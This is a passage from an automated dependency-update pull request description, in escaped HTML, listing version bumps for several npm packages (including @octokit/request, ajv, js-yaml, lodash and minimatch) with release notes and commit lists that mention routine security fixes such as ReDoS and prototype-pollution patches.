v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.0.1 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.0.1...v5.1.0\"\u003e5.1.0\u003c/a\u003e (2024-04-05)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/types\u003c/code\u003e to v13 (\u003ca href=\"https://github.com/octokit/request-error.js/commit/3af20bd58fea6cc349bc191c725e78e9cc021da6\"\u003e3af20bd\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/416\"\u003e#416\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/94147e8843898e0edd2664d0c46a4f42eb4adaa4\"\u003e94147e8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/3af20bd58fea6cc349bc191c725e78e9cc021da6\"\u003e\u003ccode\u003e3af20bd\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/types\u003c/code\u003e to v13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/94147e8843898e0edd2664d0c46a4f42eb4adaa4\"\u003e\u003ccode\u003e94147e8\u003c/code\u003e\u003c/a\u003e feat(security): Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/416\"\u003e#416\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.0.1...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.1.6 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.4.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.0\"\u003e8.4.0\u003c/a\u003e (2024-04-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ere-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003eabc4955\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/599\"\u003e#599\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.3.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.0...v8.3.1\"\u003e8.3.1\u003c/a\u003e (2024-04-05)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/endpoint\u003c/code\u003e (\u003ca href=\"https://github.com/octokit/request.js/commit/4e7127cff05fbd091306168af341a9bb7d443045\"\u003e4e7127c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.3.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.2.0...v8.3.0\"\u003e8.3.0\u003c/a\u003e (2024-04-05)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://github.com/octokit/request.js/commit/6822e8bbaa74bc177e14fabfa54e94e7f13edc68\"\u003e6822e8b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/685\"\u003e#685\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/2e6792585f64da58d735c0dda2811bf9cff0ac0e\"\u003e2e67925\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.1.6...v8.2.0\"\u003e8.2.0\u003c/a\u003e (2024-02-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd documentation link in error message (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/667\"\u003e#667\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/dbfeab2ff9d4e7b5eaf7d155b1c4cdd630928753\"\u003edbfeab2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003e\u003ccode\u003eabc4955\u003c/code\u003e\u003c/a\u003e feat: re-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/4e7127cff05fbd091306168af341a9bb7d443045\"\u003e\u003ccode\u003e4e7127c\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/endpoint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/2e6792585f64da58d735c0dda2811bf9cff0ac0e\"\u003e\u003ccode\u003e2e67925\u003c/code\u003e\u003c/a\u003e feat(security): Add provenance (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/6822e8bbaa74bc177e14fabfa54e94e7f13edc68\"\u003e\u003ccode\u003e6822e8b\u003c/code\u003e\u003c/a\u003e fix: upgrade \u003ccode\u003e@octokit/types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/dbfeab2ff9d4e7b5eaf7d155b1c4cdd630928753\"\u003e\u003ccode\u003edbfeab2\u003c/code\u003e\u003c/a\u003e feat: add documentation link in error message (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/667\"\u003e#667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/c013de4e24a01e0776661e46ba60fcf0d4670389\"\u003e\u003ccode\u003ec013de4\u003c/code\u003e\u003c/a\u003e docs: fix spelling errors (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/671\"\u003e#671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/3d22c38bc0ed14fa5ff4a732bb62bee9b62fb5e6\"\u003e\u003ccode\u003e3d22c38\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/984ec173e6dda48c4c1cd39666b8e6e2e3abfa7e\"\u003e\u003ccode\u003e984ec17\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/2a9cf786e8f3b2f900fbb06a4545d959b9fff318\"\u003e\u003ccode\u003e2a9cf78\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.1.6...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.9 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.9...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.17.23\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/dec55b7a3b382da075e2eac90089b4cd00a26cbb\"\u003e\u003ccode\u003edec55b7\u003c/code\u003e\u003c/a\u003e Bump main to v4.17.23 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6088\"\u003e#6088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/19c9251b3631d7cf220b43bc757eb33f1084f117\"\u003e\u003ccode\u003e19c9251\u003c/code\u003e\u003c/a\u003e fix: setCacheHas JSDoc return type should be boolean (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6071\"\u003e#6071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b5e672995ae26929d111a6e94589f8d03fb8e578\"\u003e\u003ccode\u003eb5e6729\u003c/code\u003e\u003c/a\u003e jsdoc: Add -0 and BigInt zeros to _.compact falsey values list (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6062\"\u003e#6062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81\"\u003e\u003ccode\u003eedadd45\u003c/code\u003e\u003c/a\u003e Prevent prototype pollution on baseUnset function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/4879a7a7d0a4494b0e83c7fa21bcc9fc6e7f1a6d\"\u003e\u003ccode\u003e4879a7a\u003c/code\u003e\u003c/a\u003e doc: fix autoLink function, conversion of source links (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6056\"\u003e#6056\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/9648f692b0fc7c2f6a7a763d754377200126c2e8\"\u003e\u003ccode\u003e9648f69\u003c/code\u003e\u003c/a\u003e chore: remove \u003ccode\u003eyarn.lock\u003c/code\u003e file (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6053\"\u003e#6053\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/dfa407db0bf5b200f2c7a9e4f06830ceaf074be9\"\u003e\u003ccode\u003edfa407d\u003c/code\u003e\u003c/a\u003e ci: remove legacy configuration files (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6052\"\u003e#6052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/156e1965ae78b121a88f81178ab81632304e8d64\"\u003e\u003ccode\u003e156e196\u003c/code\u003e\u003c/a\u003e feat: add renovate setup (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6039\"\u003e#6039\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/933e1061b8c344d3fc742cdc400175d5ffc99bce\"\u003e\u003ccode\u003e933e106\u003c/code\u003e\u003c/a\u003e ci: add pipeline for Bun (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6023\"\u003e#6023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/072a807ff7ad8ffc7c1d2c3097266e815d138e20\"\u003e\u003ccode\u003e072a807\u003c/code\u003e\u003c/a\u003e docs: update links related to Open JS Foundation (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/5968\"\u003e#5968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.17.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update 